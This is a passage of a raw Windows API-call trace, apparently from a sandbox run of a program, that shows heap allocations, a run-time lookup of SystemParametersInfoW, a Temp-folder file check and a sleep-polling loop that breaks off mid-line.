[0273.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0273.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0273.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0273.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0273.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0273.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0273.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0273.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0273.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0273.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0273.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0273.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0273.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0273.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0273.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0273.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0273.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0273.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0273.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0273.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0273.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0273.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0273.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0273.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0273.722] LoadLibraryW (lpLibFileName="user32.dll") returned 0x750c0000 [0273.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0273.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0273.723] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0273.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x16) returned 0x2e69a28 [0273.723] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x2e69a28, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemParametersInfoW", lpUsedDefaultChar=0x0) returned 22 [0273.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0273.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0273.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0273.723] GetProcAddress (hModule=0x750c0000, lpProcName="SystemParametersInfoW") returned 0x750ef210 [0273.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0273.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0273.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0273.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0273.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0273.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0273.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0273.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0273.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0273.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0273.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0273.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0273.724] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x0, fWinIni=0x0 | out: pvParam=0x0) returned 1 [0273.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f15a18 [0273.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b48 [0273.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0273.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0273.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0273.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0273.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0273.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0273.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0273.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0273.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0273.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0273.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0273.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0273.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0273.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0273.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0273.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0273.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0273.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0273.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0273.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0273.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0273.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0273.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0273.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0273.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0273.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0273.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0273.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0273.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0273.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0273.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0273.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0273.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0273.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0273.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0273.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0273.800] FreeLibrary (hLibModule=0x750c0000) returned 1 [0273.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0273.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0273.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0273.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0273.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0273.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0273.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0273.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0273.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0273.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0273.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0273.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0273.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0273.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0273.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0273.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0273.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0273.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0273.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0273.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0273.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0273.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0273.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0273.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0273.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0273.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0273.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0273.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0273.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0273.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0273.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f146b0 [0273.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0273.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0273.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f15a18 | out: hHeap=0x970000) returned 1 [0273.801] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 1 [0273.801] TranslateMessage (lpMsg=0x8cf708) returned 0 [0273.801] DispatchMessageW (lpMsg=0x8cf708) returned 0x0 [0273.801] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0273.801] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0273.802] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0273.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0273.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0273.802] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0273.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0273.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0273.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0273.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0273.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0273.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0273.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0273.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0273.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0273.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0273.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0273.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0273.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0273.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0273.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0273.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0273.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0273.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0273.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0273.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0273.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0273.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0273.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0273.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0273.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0273.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0273.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0273.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0273.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f146b0 | out: hHeap=0x970000) returned 1 [0273.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0273.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0273.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0273.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0273.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0273.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0273.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0273.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0273.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0273.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0273.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0273.803] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0273.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0273.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0273.803] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0273.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0273.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0273.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0273.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0273.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0273.803] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf3c0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0273.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0273.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x50) returned 0x2e54858 [0273.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0273.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0273.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0273.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0273.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb0) returned 0x978270 [0273.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0273.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0273.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0273.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0273.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0273.804] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\8x8x8")) returned 0x20 [0273.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978270 | out: hHeap=0x970000) returned 1 [0273.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0273.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0273.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0273.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0273.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0273.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0273.805] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0273.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0273.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0273.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0273.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0273.805] timeGetTime () returned 0x1184a31 [0273.805] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0273.805] Sleep (dwMilliseconds=0xa) [0273.852] timeGetTime () returned 0x1184a61 [0273.852] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0273.852] Sleep (dwMilliseconds=0xa) [0273.889] timeGetTime () returned 0x1184a86 [0273.889] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0273.889] Sleep (dwMilliseconds=0xa) [0273.932] timeGetTime () returned 0x1184ab0 [0273.932] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0273.932] Sleep (dwMilliseconds=0xa) [0273.982] timeGetTime () returned 0x1184ae3 [0273.982] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0273.982] Sleep (dwMilliseconds=0xa) [0273.997] timeGetTime () returned 0x1184af1 [0273.997] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0273.997] Sleep (dwMilliseconds=0xa) [0274.024] timeGetTime () returned 0x1184b0c [0274.024] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0274.024] Sleep (dwMilliseconds=0xa) [0274.038] timeGetTime () returned 0x1184b1b [0274.038] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0274.038] Sleep (dwMilliseconds=0xa) [0274.110] timeGetTime () returned 0x1184b63 [0274.110] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0274.110] Sleep (dwMilliseconds=0xa) [0274.151] timeGetTime () returned 0x1184b8c [0274.151] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0274.152] Sleep (dwMilliseconds=0xa) [0274.185] timeGetTime () returned 0x1184bad [0274.185] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0274.185] Sleep (dwMilliseconds=0xa) [0274.232] timeGetTime () returned 0x1184bdd [0274.233] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0274.233] Sleep (dwMilliseconds=0xa) [0274.261] timeGetTime () returned 0x1184bf9 [0274.261] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0274.266] Sleep (dwMilliseconds=0xa) [0274.282] timeGetTime () returned 0x1184c0f [0274.282] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0274.282] Sleep 